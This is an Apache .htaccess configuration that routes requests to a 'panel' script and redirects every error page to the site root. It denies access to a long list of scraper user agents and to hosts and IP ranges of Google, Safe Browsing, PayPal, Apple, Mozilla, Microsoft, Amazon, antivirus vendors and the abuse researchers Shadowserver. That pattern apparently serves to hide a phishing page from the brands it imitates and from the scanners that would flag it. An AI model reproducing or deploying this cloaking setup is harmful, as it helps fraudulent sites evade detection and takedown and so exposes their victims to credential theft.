DirectoryIndex index.php

RewriteEngine On
RewriteCond %{HTTP} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

RewriteRule ^real/(.*) panel.php?panel=$1 [L]

RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php

RewriteCond %{REQUEST_FILENAME}\.txt -f
RewriteRule ^(.*)$ $1.txt

ErrorDocument 401 https://%{HTTP_HOST}
ErrorDocument 403 https://%{HTTP_HOST}
ErrorDocument 404 https://%{HTTP_HOST}
ErrorDocument 500 https://%{HTTP_HOST}


RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} google\.com [NC,OR]
RewriteCond %{HTTP_REFERER} google\.com
RewriteCond %{HTTP_REFERER} paypal\.com
RewriteCond %{HTTP_REFERER} firefox\.com
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]
RewriteRule .* - [F,L]

Options -Indexes
order allow,deny
deny from *.oleane.fr
deny from *.wanadoo.fr
deny from shadowserver.org
deny from datasift.com
deny from ebay.com
deny from internetbs.net
deny from apple.com
deny from env=stealthed
deny from firefox.com
deny from google.com
deny from paypal.com
deny from datasift.com
deny from google-cache.google.co.jp
deny from google-cache.google.com
deny from googlecache.google.com
deny from googlecache.google.co.jp
deny from mozorg.dynect.mozilla.net
deny from www.mozilla.org.cdn.cloudflare.net
deny from log-334788911.us-east-1.elb.amazonaws.com
deny from avast.com.edgekey.net
deny from e3442.g.akamaiedge.net
deny from datapacket.com
deny from hwccustomers.com
deny from dyn.plus.net
deny from 89.207.18.182/22
deny from 173.194.69.147/22
deny from 149.3.176.145/22
deny from 66.235.156.128/22
deny from 173.194.69.*
deny from 173.0.*.*
deny from 2.20.6.85/22
deny from 63.245.213.92/22
deny from 173.194.69.*
deny from 63.245.213.*
deny from 64.62.203.172/22
deny from 173.194.69.*
deny from 64.62.203.172/22
deny from 63.245.217.71/22
deny from 188.112.175.207/22
deny from 66.235.139.*
deny from 149.20.57.227
deny from 199.48.147.36
deny from 37.59.162.218
deny from 89.122.57.201
deny from 69.163.205.29
deny from 74.120.15.150
deny from 109.163.233.200
deny from 79.120.86.20
deny from 31.172.30.4
deny from 109.65.136.19
deny from 66.150.14.185
deny from 50.97.98.130
deny from 66.150.14.185
deny from 80.237.226.73
deny from 64.34.184.153
deny from 66.230.230.230
deny from 71.165.245.158
deny from 74.120.15.150
deny from 76.73.56.7
deny from 77.109.139.87
deny from 81.218.219.122
deny from 83.86.110.188
deny from 83.142.228.14
deny from 83.249.87.238
deny from 85.17.92.13
deny from 85.235.31.248
deny from 87.118.104.203
deny from 88.80.28.70
deny from 88.208.121.151
deny from 89.253.97.235
deny from 91.121.170.32
deny from 94.249.153.47
deny from 95.143.193.145
deny from 109.169.29.56
deny from 109.123.119.163
deny from 137.56.163.*
deny from 173.193.221.28
deny from 192.251.226.205
deny from 192.251.226.206
deny from 199.48.147.*
deny from 199.48.147.41
deny from 208.66.135.190
deny from 209.44.114.178
deny from 209.159.142.164
deny from 209.159.143.130
deny from 213.220.233.230
deny from 8.18.38.105
deny from 62.141.58.13
deny from 62.163.180.154
deny from 77.171.107.207
deny from 78.47.251.152
deny from 81.169.155.246
deny from 82.194.86.135
deny from 83.163.192.49
deny from 91.121.152.114
deny from 91.213.50.235
deny from 93.167.245.178
deny from 94.23.215.184
deny from 174.138.169.218
deny from 64.34.162.160
deny from 66.249.9.107
deny from 66.96.16.32
deny from 78.107.233.68
deny from 78.107.237.16
deny from 83.170.92.9
deny from 85.214.73.63
deny from 91.124.187.225
deny from 194.0.229.54
deny from 195.43.157.85
deny from 212.78.238.92
deny from 217.114.211.20
deny from 62.24.222.132
deny from 62.24.222.131
deny from 66.235.133.14/22
deny from google.com
deny from paypal.com
deny from 112.2o7.com
deny from firefox.com
deny from apple.com
deny from env=stealthed
deny from 66.102
deny from 38.100
deny from 107.170
deny from 149.20
deny from 38.105
deny from 74.125
deny from 66.150.14
deny from 54.176
deny from 184.173
deny from 66.249
deny from 128.242
deny from 72.14.192
deny from 208.65.144
deny from 209.85.128
deny from 216.239.32
deny from 207.126.144
deny from 173.194
deny from 64.233.160
deny from 64.18
deny from 194.52.68
deny from 194.72.238
deny from 62.116.207
deny from 212.50.193
deny from 69.65
deny from 50.7
deny from 131.212
deny from 46.116
deny from 62.90
deny from 89.138
deny from 82.166
deny from 85.64
deny from 212.235
deny from 217.132
deny from 50.97
deny from 209.85
deny from 66.205.64
deny from 204.14.48
deny from 64.27.2
deny from 67.15
deny from 202.108.252
deny from 193.47.80
deny from 64.62.136
deny from 66.221
deny from 64.62.175
deny from 198.54
deny from 192.115.134
deny from 216.252.167
deny from 193.253.199
deny from 69.61.12
deny from 64.37.103
deny from 38.144.36
deny from 64.124.14
deny from 206.28.72
deny from 209.73.228
deny from 158.108
deny from 168.188
deny from 66.207.120
deny from 167.24
deny from 192.118.48
deny from 67.209.128
deny from 12.148.209
deny from 12.148.196
deny from 193.220.178
deny from 213.180.*.*
deny from 66.150.55.230
deny from 67.15.175.114
deny from 217.113.244.119
deny from 194.224.199
deny from 81.19.66
deny from 213.176.126
deny from 208.223.208.*
deny from 123.252.193.20
deny from 208.223.208.184
deny from 208.223.208.185
deny from 67.167.114.21
deny from 194.44.42
deny from 209.203.*.*
deny from 219.136.171
deny from 216.150.24.*
deny from 210.14.32
deny from 220.132.126
deny from 66.194.6
deny from 12.17.130.27
deny from 65.164.129.91
deny from 207.155.199.163
deny from 208.252.91.3
deny from 66.132.132.63
deny from 81.18.*.*
deny from 65.11.200.242
deny from 65.75.128.30
deny from 204.8.*.*
deny from 64.152.73
deny from 66.111.48.80
deny from 68.211.2.61
deny from 64.42.84.70
deny from 67.127.13.70
deny from 80.230
deny from 80.250.*.*
deny from 69.28.130
deny from 213.8
deny from 64.42.105
deny from 38.144.36.*
deny from 206.28.*
deny from 209.73.228.*
deny from 66.207.120.*
deny from 192.118.48.*
deny from 206.190.171.*
deny from 211.157
deny from 211.74
deny from 64.14.202.182
deny from 213.219.11.19
deny from 149.20.57.227
deny from 199.48.147.36
deny from 37.59.162.218
deny from 89.122.57.201
deny from 69.163.205.29
deny from 74.120.15.150
deny from 109.163.233.200
deny from 79.120.86.20
deny from 31.172.30.4
deny from 109.65.136.19
deny from 66.150.14.185
deny from 50.97.98.130
deny from 80.237.226.73
deny from 64.34.184.153
deny from 66.230.230.230
deny from 71.165.245.158
deny from 76.73.56.7
deny from 77.109.139.87
deny from 81.218.219.122
deny from 83.86.110.188
deny from 83.142.228.14
deny from 83.249.87.238
deny from 85.17.92.13
deny from 85.235.31.248
deny from 87.118.104.203
deny from 88.80.28.70
deny from 88.208.121.151
deny from 89.253.97.235
deny from 91.121.170.32
deny from 94.249.153.47
deny from 95.143.193.145
deny from 109.169.29.56
deny from 109.123.119.163
deny from 137.56.163.46
deny from 137.56.163.64
deny from 173.193.221.28
deny from 192.251.226.205
deny from 192.251.226.206
deny from 199.48.147.*
deny from 208.66.135.190
deny from 209.44.114.178
deny from 209.159.142.164
deny from 209.159.143.130
deny from 213.220.233.230
deny from 8.18.38.105
deny from 62.141.58.13
deny from 62.163.180.154
deny from 77.171.107.207
deny from 78.47.251.152
deny from 81.169.155.246
deny from 82.194.86.135
deny from 83.163.192.49
deny from 91.121.152.114
deny from 91.213.50.235
deny from 93.167.245.178
deny from 94.23.215.184
deny from 174.138.169.218
deny from 64.34.162.160
deny from 66.249.9.107
deny from 66.96.16.32
deny from 78.107.233.68
deny from 78.107.237.16
deny from 83.170.92.9
deny from 85.214.73.63
deny from 91.124.187.225
deny from 194.0.229.54
deny from 195.43.157.85
deny from 212.78.238.92
deny from 217.114.211.20
deny from 62.24.222.132
deny from 62.24.222.131
deny from 86.121.*
deny from 65.11.200.242
deny from 65.75.128.30
deny from 66.111.48.80
deny from 68.211.2.61
deny from 64.42.84.70
deny from 67.127.13.70
deny from 168.187
Deny from 82.165.47.*
Deny from 84.74.14
Deny from 209.185.108
Deny from dclient.hispeed.ch
Deny from 209.185.253
Deny from 209.85.238
Deny from 209.85.238.11
Deny from 209.85.238.4
Deny from 216.239.33.96
Deny from 216.239.33.97
Deny from 216.239.33.98
Deny from 216.239.33.99
Deny from 216.239.37.98
Deny from 216.239.37.99
Deny from 216.239.39.98
Deny from 216.239.39.99
Deny from 216.239.41.96
Deny from 216.239.41.97
Deny from 216.239.41.98
Deny from 216.239.41.99
Deny from 216.239.45.4
Deny from 216.239.46
Deny from 216.239.51.96
Deny from 216.239.51.97
Deny from 216.239.57.*
Deny from 216.239.59.98
Deny from 216.239.59.99
Deny from 216.33.229.163
Deny from 64.233.173.*
deny from 206.204.52.31
deny from 216.12.145.20
deny from 77.74.178.24
deny from 104.236.152.92
deny from 88.198.46.60
deny from 54.247.79.157
deny from 173.252.133.166
deny from 166.123.218.220
deny from 66.102.137.66
deny from 63.245.213.24
deny from google-cache.google.co.jp
deny from google-cache.google.com
deny from googlecache.google.com
deny from googlecache.google.co.jp
deny from googlecache.google.co.ca
deny from googlecache.google.co.uk
deny from googlecache.google.co.id
deny from googlecache.google.co.my
deny from googlecache.google.co.sg
deny from 66.211.189.217
deny from 62.146.210.86
deny from 63.245.213.32
deny from 72.32.67.100
deny from 161.69.29.243
deny from 74.50.56.73
deny from 216.10.192.106
deny from 204.79.197.200
deny from 108.163.160.243
deny from 204.79.197.219
deny from 17.146.1.15
deny from 195.122.30.*
deny from 17.172.224.47
deny from 17.178.96.59
deny from 17.142.160.59
deny from 195.13.231.*
deny from 17.172.224.38
deny from 17.142.160.9
deny from 17.178.96.9
deny from 125.6.185.51
deny from 66.211.160.87
deny from 66.211.160.86
deny from 66.135.216.190
deny from 208.43.71.132
deny from 46.4.66.67
deny from 46.4.58.71
deny from 46.4.67.14
deny from 46.4.62.212
deny from 208.43.71.135
deny from 208.43.71.130
deny from 46.4.66.143
deny from 46.4.62.150
deny from 208.43.71.134
deny from 208.43.71.133
deny from 191.239.213.197
deny from 23.100.122.175
deny from 104.40.211.35
deny from 23.96.52.53
deny from 104.43.195.251
deny from 17.173.66.*
deny from 216.239.32.27
deny from 216.58.209.142
deny from *.google.com
deny from 173.194.222.121
deny from avast.com.edgekey.net
deny from e3442.g.akamaiedge.net
deny from 104.81.223.200
deny from mozorg.dynect.mozilla.net
deny from www.mozilla.org.cdn.cloudflare.net
deny from 104.16.40.2
deny from 104.16.41.2
deny from log-334788911.us-east-1.elb.amazonaws.com
deny from  107.20.176.252
deny from  50.17.198.79
deny from  107.20.210.88
deny from  107.20.197.94
deny from  107.20.146.1
deny from  107.20.210.236
deny from  107.20.194.16
deny from  107.20.185.183
deny from *.amazonaws.com
deny from 23.235.33.67
deny from 104.156.85.67
deny from 104.156.81.67
deny from 23.235.37.67
deny from 93.184.220.29
deny from 81.198.165.11
deny from 81.198.165.24
deny from 93.184.220.*
deny from 216.58.209.*
deny from 173.194.222.*
deny from 23.52.27.27
deny from 66.235.135.*
deny from 17.142.160.*
deny from 17.178.96.*
deny from 17.172.224.*
deny from 108.161.188.*
deny from 94.31.29.*
deny from 54.247.190.*
deny from 54.247.76.*
deny from 2.17.175.50
deny from 93.184.211.*
deny from 93.184.217.*
deny from 23.100.122.*
deny from 191.239.213.*
deny from 23.96.52.*
deny from 104.43.195.*
deny from 104.40.211.*
deny from 104.25.52.*
deny from 104.25.53.*
deny from 63.110.89.222
deny from 155.64.49.*
deny from 155.64.16.*
deny from 52.27.70.*
deny from 173.245.58.*
deny from 173.245.59.*
deny from 109.68.33.100
deny from 109.68.33.102
deny from 69.25.32.3
deny from 199.43.135.*
deny from 199.43.134.*
deny from 199.4.138.*
deny from 216.239.40.*
deny from 108.170.235.*
deny from 172.217.25.*
deny from 204.74.108.1
deny from 204.74.109.1
deny from 199.7.68.1
deny from 199.7.69.1
deny from 204.74.114.1
deny from 204.74.115.1
deny from 204.69.234.1
deny from 204.74.101.1
deny from 91.228.167.*
deny from 17.151.0.*
deny from 17.254.0.*
deny from 17.112.144.*
deny from 17.171.63.*
deny from 193.108.91.240
deny from 84.53.139.*
deny from 184.85.248.65
deny from 96.7.49.66
deny from 63.245.215.*
deny from 184.30.160.*
deny from 52.84.225.*
deny from 104.93.225.*
deny from 52.41.221.*
deny from 72.21.91.*
deny from 129.250.204.*
deny from 129.250.3.*
deny from 202.68.64.*
deny from 54.239.108.*
deny from 205.251.245.*
deny from 100.65.10.*
deny from 216.182.224.*
deny from 10.0.0.1
deny from 100.66.4.*
deny from 100.66.8.*
deny from 100.66.6.*
deny from 100.66.11.*
deny from 75.125.29.*
deny from 91.213.143.*
deny from 46.4.66.*
deny from 77.67.108.33
deny from 205.251.244.*
deny from 104.130.89.232
deny from 216.58.195.*
deny from 172.217.2.*
deny from 72.14.233.*
deny from 108.170.232.*
deny from 72.14.203.*
deny from 216.58.217.*
deny from 172.217.1.*
deny from 216.239.62.*
deny from 72.14.212.*
deny from 216.239.32.*
deny from 216.239.34.*
deny from 216.239.36.*
deny from 216.239.38.*
deny from 74.125.29.*
deny from 209.85.250.*
deny from 216.239.48.*
deny from 104.16.41.*
deny from 209.85.143.*
deny from 74.125.22.*
deny from 72.14.234.*
deny from 72.14.235.*
deny from 72.14.236.*
deny from 216.239.54.*
deny from 216.239.43.*
deny from 209.85.242.*
deny from 216.239.46.*
deny from 216.239.49.*
deny from 208.69.39.*
deny from 146.112.60.*
deny from 67.215.78.*
deny from 146.112.225.*
deny from 104.16.40.*
deny from 173.194.68.*
deny from 209.85.201.*
deny from 64.233.174.*
deny from 173.194.208.*
deny from 216.239.47.*
deny from 72.14.237.*
deny from 216.58.218.*
deny from 74.125.201.*
deny from 173.194.72.*
deny from 74.125.25.*
deny from 74.125.200.*
deny from 216.239.51.*
deny from 209.85.252.*
deny from 74.125.68.*
deny from 64.233.160.*
deny from 172.217.26.*
deny from 209.85.253.*
deny from 209.85.232.*
deny from 63.245.214.*
deny from 63.245.219.*
deny from 64.125.170.*
deny from 63.245.213.*
deny from 52.88.147.*
deny from 52.33.84.*
deny from 52.24.88.*
deny from 54.148.104.*
deny from 52.10.49.*
deny from 54.191.14.*
deny from 100.64.16.74
deny from 100.64.16.170
deny from 100.64.16.174
deny from 205.251.197.147
deny from 205.251.198.73
deny from 205.251.193.114
deny from 205.251.194.178
deny from 52.84.121.93
deny from 52.84.224.48
deny from 54.243.37.238
deny from 107.22.198.146
deny from 17.151.62.*
deny from 17.171.2.*
deny from 104.87.137.*
deny from 104.93.216.*
deny from 17.0.132.*
deny from 17.0.78.*
deny from 17.0.149.*
deny from 17.1.144.*
deny from 184.30.171.*
deny from 23.73.146.*
deny from 23.50.244.44
deny from 23.73.145.151
deny from 17.151.132.*
deny from 17.148.254.*
deny from 17.0.74.*
deny from 17.0.129.*
deny from 17.0.88.*
deny from 17.0.76.*
deny from 17.146.1.*
deny from 17.154.66.*
deny from 17.154.65.*
deny from 17.0.131.*
deny from 17.0.128.*
deny from 17.151.31.*
deny from 104.96.220.120
deny from 104.96.220.170
deny from 17.173.66.*
deny from 17.168.2.*
deny from 17.0.140.*
deny from 17.141.139.*
deny from 17.111.65.*
deny from 17.111.0.*
deny from 17.0.156.*
deny from 17.0.136.*
deny from 17.0.148.*
deny from 17.254.2.*
deny from 17.254.1.*
deny from 23.73.155.91
deny from 104.95.26.239
deny from 17.137.160.*
deny from 17.171.69.*
deny from 17.171.11.*
deny from 23.55.249.166
deny from 23.73.158.232
deny from 17.151.1.*
deny from 23.73.152.71
deny from 23.55.249.76
deny from 17.254.21.*
deny from 4.28.172.82
deny from 17.151.2.*
deny from 23.55.245.166
deny from 23.63.245.38
deny from 23.55.255.197
deny from 77.234.47.*
deny from 23.77.181.92
deny from 208.43.118.138
deny from 173.192.18.189
deny from 72.21.221.50
deny from 50.97.16.68
deny from 54.88.109.16
deny from 5.45.58.*
deny from 195.74.76.*
deny from 52.86.128.187
deny from 54.210.231.155
deny from 31.30.0.70
deny from 77.234.44.*
deny from 148.251.229.77
deny from 148.251.229.78
deny from 148.251.229.79
deny from 207.67.0.69
deny from 81.21.148.214
deny from 208.79.251.130
deny from 89.1.11.160
deny from 23.77.161.206
deny from 104.96.220.98
deny from 104.96.220.137
deny from 104.96.220.106
deny from 104.96.220.128
deny from 5.45.62.*
deny from 192.229.163.42
deny from 72.21.91.8
deny from 68.232.44.253
deny from 185.26.230.9
deny from 91.231.212.*
deny from 185.83.102.42
deny from 185.83.100.43
deny from 213.199.180.*
deny from 72.21.91.95
deny from 68.232.44.95
deny from 5.149.112.46
deny from 40.69.43.*
deny from 72.21.81.253
deny from 208.78.70.6
deny from 204.13.250.6
deny from 208.78.71.6
deny from 204.13.251.6
deny from 91.228.165.*
deny from 52.21.69.82
deny from 52.21.38.34
deny from 91.228.166.*
deny from 149.6.174.178
deny from 149.6.174.179
deny from 149.6.174.180
deny from 149.6.174.181
deny from 149.6.174.182
deny from 149.6.174.183
deny from 138.91.172.*
deny from 104.44.8.*
deny from 104.44.9.*
deny from 104.44.4.*
deny from 207.46.41.*
deny from 52.202.183.217
deny from 52.201.29.113
deny from 38.90.227.28
deny from 138.91.138.*
deny from 138.91.91.1
deny from 191.239.16.1
deny from 52.84.127.*
deny from 40.118.248.*
deny from 38.90.226.10
deny from 38.90.226.54
deny from 82.99.191.22
deny from 82.99.191.20
deny from 87.197.254.*
deny from 23.96.*
deny from 54.247.162.75
deny from 193.25.198.216
deny from 81.92.115.245
deny from 70.167.14.42
deny from 89.1.11.75
deny from 91.228.164.*
deny from 52.7.45.81
deny from 52.87.56.87
deny from 191.237.92.*
deny from 62.146.210.*
deny from 185.123.224.*
deny from 217.160.113.81
deny from 89.146.248.46
deny from 212.79.247.*
deny from 89.105.213.144
deny from 52.6.96.60
deny from 107.23.149.215
deny from 52.19.105.174
deny from 54.194.221.127
deny from 54.76.254.181
deny from 89.1.11.138
deny from 54.77.20.93
deny from 52.58.92.116
deny from 54.93.133.218
deny from 212.123.127.40
deny from 62.146.87.*
deny from 185.123.225.*
deny from 52.29.70.228
deny from 52.17.161.99
deny from 52.18.182.157
deny from 208.84.0.*
deny from 208.84.1.*
deny from 208.84.2.*
deny from 208.84.3.*
deny from 208.84.4.*
deny from 208.84.5.*
deny from 208.84.6.*
deny from 208.84.7.*
deny from 193.221.113.*
deny from 208.76.47.*
deny from 208.76.46.*
deny from 208.76.45.*
deny from 208.76.44.*
deny from 191.239.*
deny from 104.40.*
deny from 104.41.*
deny from 104.42.*
deny from 104.43.*
deny from 104.44.*
deny from 104.45.*
deny from 23.100.*
deny from 104.90.84.14
deny from 204.152.140.*
deny from 204.152.141.*
deny from 207.46.*
deny from 155.64.*
deny from 23.77.93.115
deny from 216.10.193.*
deny from 63.245.206.63
deny from 23.77.170.55
deny from 209.112.113.33
deny from 209.112.114.33
deny from 69.36.145.33
deny from 1.1.114.31
deny from 104.93.220.187
deny from 143.127.*
deny from 184.30.232.210
deny from 63.245.197.90
deny from 206.204.54.184
deny from 206.204.54.94
deny from 93.184.*.*
deny from 193.108.91.182
deny from 84.53.139.66
deny from 2.22.230.65
deny from 95.100.175.66
deny from 23.74.25.67
deny from 23.211.133.67
deny from 23.38.183.47
deny from 104.70.72.42
deny from 52.21.167.10
deny from 52.23.73.172
deny from 54.236.143.197
deny from 54.174.133.33
deny from 108.168.138.44
deny from 98.124.246.1
deny from 98.124.246.2
deny from 98.124.217.1
deny from 178.32.143.122
deny from 209.213.221.170
deny from 216.87.155.33
deny from 216.87.152.33
deny from 67.23.242.236
deny from 208.109.255.48
deny from 216.69.185.48
deny from 208.94.148.4
deny from 208.80.124.4
deny from 208.80.126.4
deny from 208.80.125.4
deny from 208.80.127.4
deny from 208.94.149.4
deny from 95.211.125.236
deny from 95.211.125.248
deny from 104.25.148.20
deny from 104.25.149.20
deny from 208.94.148.2
deny from 208.80.124.2
deny from 208.80.126.2
deny from 208.80.125.2
deny from 208.80.127.2
deny from 207.226.161.2
deny from 208.83.60.23
deny from 192.220.124.10
deny from 192.220.125.10
deny from 192.124.249.16
deny from 192.99.46.177
deny from 192.99.17.220
deny from 23.92.28.99
deny from 37.187.162.28
deny from 54.243.247.173
deny from 54.235.146.190
deny from 54.243.185.251
deny from 54.227.243.4
deny from 107.20.181.115
deny from 150.70.162.205
deny from 204.15.67.13
deny from 52.31.26.36
deny from 52.208.101.178
deny from 52.48.96.57
deny from 54.154.236.171
deny from 199.66.200.37
deny from 23.211.61.64
deny from 193.108.91.109
deny from 193.108.91.11
deny from 193.108.91.117
deny from 193.108.91.73
deny from 193.108.91.90
deny from 193.108.91.93
deny from 72.246.46.64
deny from 103.41.177
deny from 104.156.240.161
deny from 104.156.60
deny from 104.156.61
deny from 104.156.62
deny from 104.156.63
deny from 104.19.195.102
deny from 104.20.185.42
deny from 104.20.43.114
deny from 104.200.151.3
deny from 104.200.151.49
deny from 104.244.42.1
deny from 104.244.42.136
deny from 104.25.70.99
deny from 104.28.24.9
deny from 104.93.125
deny from 104.93.86
deny from 109.163.234
deny from 111.*.*.*
deny from 113.*.*.*
deny from 13.32.224.*
deny from 13.54.44
deny from 137.74.169.241
deny from 139.59.4.194
deny from 151.101.60.207
deny from 162.216.46
deny from 162.216.46.78
deny from 164.132.51
deny from 165.117.232.82
deny from 165.160.32
deny from 168.235.193.143
deny from 17
deny from 172.200
deny from 172.201
deny from 172.202
deny from 172.203
deny from 172.204
deny from 172.205
deny from 172.206
deny from 172.207
deny from 172.208
deny from 172.209
deny from 172.210
deny from 172.211
deny from 172.212
deny from 172.213
deny from 172.214
deny from 172.215
deny from 172.216
deny from 172.217
deny from 172.98.67.21
deny from 173.199.65
deny from 176.10.99
deny from 176.126.251
deny from 176.126.252
deny from 176.126.253
deny from 176.126.254
deny from 176.126.255
deny from 185.103.99.60
deny from 185.135.90
deny from 192.42.116
deny from 199.249.223.79
deny from 199.68.196.124
deny from 202.73.22.3
deny from 203.117.172.231
deny from 203.69.105.240
deny from 208.109.4.218
deny from 208.167.254.213
deny from 208.43.71
deny from 213.32.55.247
deny from 216.230.148.77
deny from 216.58.*.*
deny from 23.2.64
deny from 23.22.65
deny from 23.23.120
deny from 35.163.228
deny from 37.220.35
deny from 4.14.64.152
deny from 4.14.64.154
deny from 46.101.139
deny from 46.28.107
deny from 51.15.50.10
deny from 51.254.172.*
deny from 52.196.105
deny from 52.221.*.*
deny from 52.222.174.*
deny from 52.222.*.*
deny from 52.63.16
deny from 52.67.25
deny from 52.84.*.*
deny from 52.85.*.*
deny from 54.192.*.*
deny from 54.230.*.*
deny from 56.41
deny from 62.146.210
deny from 62.146.211
deny from 64.124.32.84
deny from 65.130.234.50
deny from 65.208.151.*
deny from 66.235.*.*
deny from 69.192.2
deny from 72.52.75.27
deny from 74.221.209.160
deny from 78.109.23.1
deny from 78.47.189.209
deny from 85.248.227.164
deny from 85.93.218
deny from 87.65.241.128
deny from 91.103.*.*
deny from 91.182.62.54
deny from 91.183.2.68
deny from 91.197.234.102
deny from 92.222.69.25
deny from 93.159.*.*
deny from 94.242.246.23
deny from 96.94.247.225
deny from 173.252.123.181
deny from 159.69.144.*
deny from 195.201.141.*
deny from 108.52.212.37
deny from 213.205.198.191
deny from 97.77.233.154
deny from 97.81.38.223
deny from 38.122.73.38
deny from 209.19.191.78
deny from 209.66.70.253
deny from 209.66.70.253
deny from 206.80.115.118
deny from 65.154.226.100
deny from 82.102.16.22
deny from 86.150.21.89
deny from 5.62.41.2
deny from 199.30.228.158
deny from 188.166.63.71
deny from 196.52.84.25
deny from 209.242.208.98
deny from 70.42.131.106
deny from 52.37.211.217
deny from 69.164.*.*
deny from 49.144.3.254
deny from 91.103.66.*
deny from 91.103.66.202
deny from 8.28.16.254
deny from 165.227.0.128
deny from 173.244.36.12
deny from 201.75.29.254
deny from 193.128.114.43
deny from 89.234.68.78
deny from 74.66.226.174
deny from 74.67.111.164
deny from 73.75.90.95
deny from 108.45.112.82
deny from 208.101.16.74
deny from 189.48.129.255
deny from 52.71.155.178
deny from 69.4.89.106
deny from 93.119.227.19
deny from 104.192.74.20
deny from 18.206.242.43
deny from 54.90.213.48
deny from 35.230.58.15
deny from 185.93.1.147
deny from 35.230.58.15
deny from 35.230.49.100
deny from 50.102.29.54
deny from 98.248.140.232
deny from 50.50.109.200
deny from 62.24.151.227
deny from 72.191.96.105
deny from 108.183.48.3
deny from 69.243.99.252
deny from 100.18.14.16
deny from 54.159.107.163
deny from 98.249.196.197
deny from 98.220.120.79
